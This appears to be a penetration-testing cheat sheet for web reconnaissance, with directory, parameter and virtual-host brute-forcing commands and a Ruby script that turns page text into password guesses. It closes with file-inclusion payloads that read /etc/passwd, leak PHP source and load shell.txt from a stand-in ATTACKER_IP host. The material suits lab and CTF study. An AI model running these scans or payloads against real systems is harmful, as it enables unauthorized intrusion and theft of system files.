Directory enumeration
Hints:
- Add --insecuressl when dealing with HTTPS.
- Don’t forget to search for exploits for standard cgi files!
- Use dirbuster (UI) as well. Why not…
General search
nikto -host $target
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
HTTP_PROXY="socks4://127.0.0.1:9990/" gobuster dir -u http://$target/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
If there is the error "Error: error on parsing arguments: status-codes ("200") and status-codes-blacklist ("404") are both set - please set only one. status-codes-blacklist is set by default so you might want to disable it by supplying an empty string.", use the -b flag instead:
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -b 301
Alternative with dirsearch:
python3 /opt/dirsearch/dirsearch.py -u http://$target/ --random-agent -e php,html,sql -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r [--header "Authorization: Basic b2Zmc2VjOmVsaXRl"]
Searching for file suffixes
proxychains4 -q dirb http://$target/index /opt/wfuzz/wordlist/general/extensions_common.txt -t
gobuster dir -u http://$target -t 40 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .php,.html,.bak,.txt,.sql,.zip,.xml,.db,.sh
Search for cgi-bin related things
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s '200,204,301,302,307,403,500' -e
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -s '200' -e
Search within parameters
- Assume there is a URL like /index?file=bla.php
- Then, use Gobuster with the length parameter and note the size of the error document:
gobuster dir -u http://$target/blog/?lang= -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 -l --wildcard
- Perform the search and remove all lines which have that exact size:
gobuster dir -u http://$target/blog/?lang= -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60 -l --wildcard -x .php,.inc,.htm,.html | grep -v 2720
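To get that baseline size, request a value that is guaranteed not to exist and count the body bytes. A minimal sketch (the URL in the comment is hypothetical; printf stands in for the real response body here):

```shell
# In practice, probe a value that cannot exist and measure the body:
#   curl -s "http://$target/blog/?lang=doesnotexist" | wc -c
# Simulated with a stand-in string so the pipeline itself is visible:
baseline=$(printf '%s' 'stand-in for the error page body' | wc -c)
echo "Baseline error size: $baseline"
```

Whatever number comes back is the value to filter out with grep -v in the gobuster run above.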
Search for endpoints / URLs
Use hakrawler to crawl the site and return a list of unique endpoints from it.
echo "http://$target" | hakrawler -u
Creating wordlists from documents / HTML pages
With curl
curl http://$target/website | grep -oE '\w+' | sort -u -f | more
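The same pipeline works with a minimum word length, which removes most of the noise words. A sketch with a sample string in place of the curl output (the 5-character minimum is an arbitrary choice):

```shell
# Keep only words of 5+ characters, deduplicated case-insensitively;
# the echo stands in for: curl -s http://$target/website
echo "Gaara is a ninja from Sunagakure" | grep -oE '\w{5,}' | sort -u -f
```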
With Ruby
Use this Ruby script and add your HTML output / text to extract significant words you could try as passwords or as entries in a gobuster wordlist.
require 'set'

# Sample stopwords list (add more based on the language you're working with)
STOPWORDS = Set.new(%w[the and is in of to for a on that by as with it at from this be an or are])

# Function to extract potential passwords from the text
def extract_significant_words(text)
  # Split the text into words, remove punctuation, and filter out stopwords and short words
  words = text.scan(/\b\w+\b/)
              .map(&:downcase) # Normalize to lowercase
              .reject { |word| word.length <= 4 || STOPWORDS.include?(word) }

  # Count word frequencies
  frequency = Hash.new(0)
  words.each { |word| frequency[word] += 1 }

  # Filter out overly common words (words that occur too many times).
  # Keep the threshold at least 1, otherwise short inputs (< 50 words)
  # get a threshold of 0 and nothing is returned.
  threshold = [words.size / 50, 1].max # Adjust this threshold as necessary
  significant_words = frequency.select { |_word, count| count <= threshold }

  # Return the unique significant words
  significant_words.keys
end

# Example usage
text = <<-TEXT
Gaara is a character in the Naruto anime. He is a ninja from Sunagakure and became the Kazekage. Gaara fights using sand, controlled by his connection to Shukaku, the tailed beast.
TEXT

# Extract and print significant words
password_candidates = extract_significant_words(text)
puts password_candidates
Fuzzing parameters
With Wfuzz:
wfuzz -z range,0-10 --hl 97 http://$target/sator.php?p1=FUZZ
Excluding content: this makes requests from 0-100 for the POST parameter id_no and hides every response whose body matches the regex given to --hs (here just a 3).
wfuzz -z range,0-100 -d "id_no=FUZZ" --hs 3 "http://faculty.htb/admin/ajax.php?action=login_faculty"
Interesting files
Vhost enumeration
ffuf -u http://linkvortex.htb/ -w subdomains.txt -H "Host: FUZZ.linkvortex.htb" -mc 200
Alternative:
gobuster vhost -u http://$VICTIM_DOMAIN/ --append-domain -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 60
Alternative:
dnsrecon -d domain.com -D vhost_names.txt -t brt
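A discovered vhost still has to resolve locally before gobuster or a browser can reach it. A sketch with hypothetical values, writing to a scratch file here; in practice append the line to /etc/hosts via sudo tee -a:

```shell
# Map a newly discovered vhost to the target IP (IP and name are hypothetical).
# Real usage: echo "$entry" | sudo tee -a /etc/hosts
entry="10.10.10.5 dev.linkvortex.htb"
echo "$entry" >> ./hosts.local
cat ./hosts.local
```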
Other techniques
- Use local file inclusion (LFI): try to change a filename parameter to read/parse a local file.
- Use remote file inclusion (RFI): try to prepend a protocol like http:// to include a file from your own server.
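A few classic payload shapes for such a file parameter (parameter name and paths are illustrative, not from any specific target; the php://filter wrapper base64-encodes the source so PHP returns it instead of executing it):

```
/index?file=../../../../etc/passwd
/index?file=php://filter/convert.base64-encode/resource=index.php
/index?file=http://ATTACKER_IP/shell.txt
```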